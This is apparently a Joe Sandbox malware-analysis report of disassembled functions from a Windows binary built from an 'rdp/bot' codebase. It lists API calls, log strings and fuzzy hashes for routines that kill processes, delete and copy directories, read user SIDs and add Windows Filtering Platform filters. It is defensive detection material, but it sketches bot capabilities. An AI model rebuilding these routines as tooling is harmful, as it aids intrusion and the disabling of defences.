Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
Instruction ID: 70324a246fb04341b71d40ee0256abe0e1e5145744551c046008c6126c6df09e
Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
Instruction Fuzzy Hash: B5A00212D8DC09C4EA441F01EC81171A528EB06700FC42135C028521559B2C9001C114

Function 00007FF764CC212F Relevance: 66.9, APIs: 13, Strings: 25, Instructions: 417processstringCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF764CC2163
Process32First.KERNEL32 ref: 00007FF764CC2197
GetLastError.KERNEL32 ref: 00007FF764CC2227
GetLastError.KERNEL32 ref: 00007FF764CC22FF
strcmp.MSVCRT ref: 00007FF764CC24CA
OpenProcess.KERNEL32 ref: 00007FF764CC24E2
TerminateProcess.KERNEL32 ref: 00007FF764CC24FC
GetLastError.KERNEL32 ref: 00007FF764CC250A
CloseHandle.KERNEL32 ref: 00007FF764CC2895

Strings

P, xrefs: 00007FF764CC2439
P, xrefs: 00007FF764CC2395
[I] (%s) -> Done(name=%s,pid=%lu), xrefs: 00007FF764CC28B5
P, xrefs: 00007FF764CC22B8
[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x), xrefs: 00007FF764CC2205
[E] (%s) -> Process32First failed(gle=%lu), xrefs: 00007FF764CC2320
[E] (%s) -> Process32Next failed(gle=%lu), xrefs: 00007FF764CC2720
~, xrefs: 00007FF764CC2430
process_kill, xrefs: 00007FF764CC21CC, 00007FF764CC21FE, 00007FF764CC2232, 00007FF764CC2319, 00007FF764CC2515, 00007FF764CC25AE, 00007FF764CC2719, 00007FF764CC28AE
, xrefs: 00007FF764CC253C
[E] (%s) -> OpenProcess failed(gle=%lu), xrefs: 00007FF764CC25B5
, xrefs: 00007FF764CC2245
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF764CC21BE
~, xrefs: 00007FF764CC22AF
[E] (%s) -> TerminateProcess failed(gle=%lu), xrefs: 00007FF764CC251C
P, xrefs: 00007FF764CC2614
~, xrefs: 00007FF764CC260B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC21D3
, xrefs: 00007FF764CC25D5
|, xrefs: 00007FF764CC21B6
(name != NULL) || (pid != 0), xrefs: 00007FF764CC21C5
, xrefs: 00007FF764CC232C
[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu), xrefs: 00007FF764CC2239
~, xrefs: 00007FF764CC238C
NULL, xrefs: 00007FF764CC2916, 00007FF764CC2922

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
API String ID: 3326156344-4160762685
Opcode ID: f36b7c31478ebaac28c746990784f070a11eaabb6d248c98853b6acce66a1a3f
Instruction ID: c1fa14e8d31c4a2a1646debec534038e0f5f3c09e37f081584c36ee1c5501fc5
Opcode Fuzzy Hash: f36b7c31478ebaac28c746990784f070a11eaabb6d248c98853b6acce66a1a3f
Instruction Fuzzy Hash: BCF1F315E0C603C2FA74BF57A8E03F9D240AF14755EA43033CA0E4A3D6DD9EAD85DA62

Function 00007FF764CC4D81 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF764CC4DA6
RemoveDirectoryA.KERNEL32 ref: 00007FF764CC4DBE
GetLastError.KERNEL32 ref: 00007FF764CC4DC8

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

strcpy.MSVCRT ref: 00007FF764CC4E92
strlen.MSVCRT ref: 00007FF764CC4E9A
strlen.MSVCRT ref: 00007FF764CC4EB6
strlen.MSVCRT ref: 00007FF764CC4EC7
strcpy.MSVCRT ref: 00007FF764CC4EE1
strlen.MSVCRT ref: 00007FF764CC4EE9
strlen.MSVCRT ref: 00007FF764CC4F0B
strlen.MSVCRT ref: 00007FF764CC4F1F
strcmp.MSVCRT ref: 00007FF764CC4F61
strcmp.MSVCRT ref: 00007FF764CC4F74
RemoveDirectoryA.KERNEL32 ref: 00007FF764CC501D
GetLastError.KERNEL32 ref: 00007FF764CC502B

Strings

[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF764CC5118
[D] (%s) -> Delete(path_wc=%s,f_path=%s), xrefs: 00007FF764CC4F94
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC4E11
(path != NULL), xrefs: 00007FF764CC4E03
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC4DFC
[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF764CC4DE6, 00007FF764CC5049
*, xrefs: 00007FF764CC4ECC
fs_dir_delete, xrefs: 00007FF764CC4DDF, 00007FF764CC4E0A, 00007FF764CC4F8D, 00007FF764CC5042, 00007FF764CC5111, 00007FF764CC5174
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF764CC517B
NULL, xrefs: 00007FF764CC5165

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 2460052984-4087913290
Opcode ID: 0fc17c46db865c1615c69aca4196e2e9f7880f0c7a1aa8583c36091478369d30
Instruction ID: 14510061c3ccfce1e0f33eb3958e920ca709b63f1ca43de677f6b5ce12052370
Opcode Fuzzy Hash: 0fc17c46db865c1615c69aca4196e2e9f7880f0c7a1aa8583c36091478369d30
Instruction Fuzzy Hash: 34A18D21A0C682C5FA30BF17A5D43BAE391AF81345FD46033D94E86796EE3CE446CB25

Function 00007FF764CC53BF Relevance: 42.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00007FF764CC541A
strlen.MSVCRT ref: 00007FF764CC5422
strlen.MSVCRT ref: 00007FF764CC5443
strlen.MSVCRT ref: 00007FF764CC5455
strcmp.MSVCRT ref: 00007FF764CC54FD
strcmp.MSVCRT ref: 00007FF764CC5515
strcat.MSVCRT ref: 00007FF764CC5575
strlen.MSVCRT ref: 00007FF764CC557D
strcpy.MSVCRT ref: 00007FF764CC5663
strlen.MSVCRT ref: 00007FF764CC566B
strlen.MSVCRT ref: 00007FF764CC568D
strcat.MSVCRT ref: 00007FF764CC56A6
strcpy.MSVCRT ref: 00007FF764CC56B9
strlen.MSVCRT ref: 00007FF764CC56C1
strlen.MSVCRT ref: 00007FF764CC56E3
strcat.MSVCRT ref: 00007FF764CC56FF

Strings

[I] (%s) -> Done(src=%s,dst=%s), xrefs: 00007FF764CC58EC
|, xrefs: 00007FF764CC5582
[E] (%s) -> Failed(src=%s,dst=%s,err=%08x), xrefs: 00007FF764CC5870
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC55DB, 00007FF764CC5606
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC55C6, 00007FF764CC55F1
[D] (%s) -> Copy(f_src=%s,f_dst=%s), xrefs: 00007FF764CC5719
(src != NULL), xrefs: 00007FF764CC55CD
[I] (%s) -> Filtered(f_src=%s,flt=%s), xrefs: 00007FF764CC55AD
*, xrefs: 00007FF764CC545A
(dst != NULL), xrefs: 00007FF764CC55F8
NULL, xrefs: 00007FF764CC58CD, 00007FF764CC58D6
fs_dir_copy, xrefs: 00007FF764CC55A6, 00007FF764CC55D4, 00007FF764CC55FF, 00007FF764CC5712, 00007FF764CC5869, 00007FF764CC58E5

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strlen$strcatstrcpy$strcmp
String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
API String ID: 2140730755-3699962909
Opcode ID: fad4b9403eb5c606afc846fb097ff816f2957a0621f72230effb5d2132d0abe6
Instruction ID: 3beecf80fe3e0c0529ec596058e7d961ca53790e26ecab1f4bfbe2e64e28fdb3
Opcode Fuzzy Hash: fad4b9403eb5c606afc846fb097ff816f2957a0621f72230effb5d2132d0abe6
Instruction Fuzzy Hash: 78C16C61A0C692C1FA30AF17A5C43FAE251AF45388FD46037DA4D46B85EF6CE50ACF25

Function 00007FF764CC1D60 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 207memoryCOMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32 ref: 00007FF764CC1D8A
GetTokenInformation.ADVAPI32 ref: 00007FF764CC1DC0
GetLastError.KERNEL32 ref: 00007FF764CC1DCE
LocalFree.KERNEL32 ref: 00007FF764CC1E08
CloseHandle.KERNEL32 ref: 00007FF764CC1E13
GetLastError.KERNEL32 ref: 00007FF764CC1EB8
LocalAlloc.KERNEL32 ref: 00007FF764CC1F70
GetTokenInformation.ADVAPI32 ref: 00007FF764CC1F9E
GetLastError.KERNEL32 ref: 00007FF764CC1FAC

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

LocalAlloc.KERNEL32 ref: 00007FF764CC209A
GetLengthSid.ADVAPI32 ref: 00007FF764CC20AC
memcpy.MSVCRT ref: 00007FF764CC20BC

Strings

process_get_user_sid, xrefs: 00007FF764CC1DE3, 00007FF764CC1E39, 00007FF764CC1E69, 00007FF764CC1E9A, 00007FF764CC1EC6, 00007FF764CC1FBA
(hnd != NULL), xrefs: 00007FF764CC1E32
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC1E40, 00007FF764CC1E70
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF764CC1E2B, 00007FF764CC1E5B
[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu), xrefs: 00007FF764CC1ECD
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF764CC1EA1
(sid != NULL), xrefs: 00007FF764CC1E62
[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu), xrefs: 00007FF764CC1DEA, 00007FF764CC1FC1

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
API String ID: 3826151639-1775164968
Opcode ID: 38b010815dbec29c0c3ab1ed48cfa7f6bf299a92cfaca6f2c76bf7918cb94b74
Instruction ID: 011a22c10354afea2d09727839591cfd8083e79592723ba99576f09e522b4dcd
Opcode Fuzzy Hash: 38b010815dbec29c0c3ab1ed48cfa7f6bf299a92cfaca6f2c76bf7918cb94b74
Instruction Fuzzy Hash: B2913A21E0C502C5FA70AF0BE4E47B9D652AF84795FD52037D54E87390EE3CE8869B61

Function 00007FF764CC795A Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF764CC797E
HeapAlloc.KERNEL32 ref: 00007FF764CC798F
GetProcessHeap.KERNEL32 ref: 00007FF764CC7C24
HeapFree.KERNEL32 ref: 00007FF764CC7C35
FwpmFilterAdd0.FWPUCLNT ref: 00007FF764CC7BEA

Part of subcall function 00007FF764CC14E2: fwrite.MSVCRT ref: 00007FF764CC158E
Part of subcall function 00007FF764CC14E2: fflush.MSVCRT ref: 00007FF764CC159A

FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF764CC7C74
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF764CC7CAF
FwpmFilterAdd0.FWPUCLNT ref: 00007FF764CC7D44

Strings

mem_alloc, xrefs: 00007FF764CC7C52
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx), xrefs: 00007FF764CC7C0E
TL, xrefs: 00007FF764CC79C0
3L, xrefs: 00007FF764CC7B7F
[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF764CC7C94
;9rJ, xrefs: 00007FF764CC7CEF
TL, xrefs: 00007FF764CC7A0C
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF764CC7C59
[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx), xrefs: 00007FF764CC7CD9
[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx), xrefs: 00007FF764CC7D6E
setup_svc_filt, xrefs: 00007FF764CC7C07, 00007FF764CC7C8D, 00007FF764CC7CD2, 00007FF764CC7D67

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
API String ID: 3629392964-1470975255
Opcode ID: 7bfcbb9f52a8204b1055f7c977a7665a6fc2573a7bbac19e2ee08251f1f54cf5
Instruction ID: 3d851669fa4374ae7adbd376ad1b7d68f669dd71aef7dcb6c373477aaaaab19b
Opcode Fuzzy Hash: 7bfcbb9f52a8204b1055f7c977a7665a6fc2573a7bbac19e2ee08251f1f54cf5
Instruction Fuzzy Hash: C9A1902260D7C2C5E771EF16A8803AAA7A1FB91780F445135EACC4BB99EF3DC084CB50

Function 00007FF764CC8153 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF764CC8008: GetFileAttributesW.KERNEL32 ref: 00007FF764CC8019

wcslen.MSVCRT ref: 00007FF764CC8195
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF764CC8241
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF764CC827F
FwpmFilterAdd0.FWPUCLNT ref: 00007FF764CC8448
GetProcessHeap.KERNEL32 ref: 00007FF764CC848A
HeapFree.KERNEL32 ref: 00007FF764CC849B
GetProcessHeap.KERNEL32 ref: 00007FF764CC84B2
HeapFree.KERNEL32 ref: 00007FF764CC84C3
FwpmFilterAdd0.FWPUCLNT ref: 00007FF764CC8523

Strings

;9rJ, xrefs: 00007FF764CC84CE
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx), xrefs: 00007FF764CC8468
setup_app_filt, xrefs: 00007FF764CC825A, 00007FF764CC829C, 00007FF764CC8461, 00007FF764CC8540
[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF764CC8261
3L, xrefs: 00007FF764CC83DD
[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx), xrefs: 00007FF764CC82A3
[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx), xrefs: 00007FF764CC8547
TL, xrefs: 00007FF764CC81B9
TL, xrefs: 00007FF764CC8205

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
API String ID: 2990311666-1793103013
Opcode ID: d655908945121547b505d4462593f4d2a8dfa4c8ede1e33e152b5925720e049f
Instruction ID: 043cdd30ba64dab6fd34a0f367d3a709992b1640b6d724cf53853cd1079178d0
Opcode Fuzzy Hash: d655908945121547b505d4462593f4d2a8dfa4c8ede1e33e152b5925720e049f
Instruction Fuzzy Hash: AA91C32260DBC2C5E771DF16A8803AAB7A1EB81740F945139EACC4BB99EF3DC145CB10

Function 00007FF764CC405E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF764CC407D
CreateDirectoryA.KERNEL32 ref: 00007FF764CC409F
GetLastError.KERNEL32 ref: 00007FF764CC40F0
strcpy.MSVCRT ref: 00007FF764CC4141
strlen.MSVCRT ref: 00007FF764CC4149
strlen.MSVCRT ref: 00007FF764CC4165
strlen.MSVCRT ref: 00007FF764CC4176
CreateDirectoryA.KERNEL32 ref: 00007FF764CC41E7
GetLastError.KERNEL32 ref: 00007FF764CC41F1

Strings

[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF764CC42C6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC40D5
(path != NULL), xrefs: 00007FF764CC40C7
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF764CC40C0
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF764CC432D
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF764CC4109
fs_dir_create, xrefs: 00007FF764CC40CE, 00007FF764CC4102, 00007FF764CC4199, 00007FF764CC42BF, 00007FF764CC4326
NULL, xrefs: 00007FF764CC4317
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FF764CC41A0

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: dec58823f199da94fdba3867a4c4aec1f2d45fc7824aa0f1766a798ce2146470
Instruction ID: 574cd0e3336efce759aa1932563429e39c9c21a68c2fff6213da747cac2a6fa3
Opcode Fuzzy Hash: dec58823f199da94fdba3867a4c4aec1f2d45fc7824aa0f1766a798ce2146470
Instruction Fuzzy Hash: E7719C11A0C643C1FB307F17E8C17B99651AF94748FD4A133C94E467A1EE2CE845CB29

Function 00007FF764CC341C Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 187synchronizationCOMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32 ref: 00007FF764CC3436
WaitForSingleObject.KERNEL32 ref: 00007FF764CC345A
GetExitCodeProcess.KERNEL32 ref: 00007FF764CC3468
GetLastError.KERNEL32 ref: 00007FF764CC350F
TerminateProcess.KERNEL32 ref: 00007FF764CC35FC
GetLastError.KERNEL32 ref: 00007FF764CC360A
GetLastError.KERNEL32 ref: 00007FF764CC36F1

Part of subcall function 00007FF764CC33C0: CloseHandle.KERNEL32 ref: 00007FF764CC33D8
Part of subcall function 00007FF764CC33C0: CloseHandle.KERNEL32 ref: 00007FF764CC33DE

Strings

[I] (%s) -> Done(pid=%lu,exit_code=%08lx), xrefs: 00007FF764CC349F
[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FF764CC3525
(pi != NULL), xrefs: 00007FF764CC34BC
process_close, xrefs: 00007FF764CC3498, 00007FF764CC34C3, 00007FF764CC34F2, 00007FF764CC351E, 00007FF764CC3619, 00007FF764CC36FE
[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FF764CC3705
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF764CC34CA
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF764CC34B5
[E] (%s) -> Failed(pid=%lu,err=%08x), xrefs: 00007FF764CC34F9
[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu), xrefs: 00007FF764CC3620

Memory Dump Source

Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true

Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
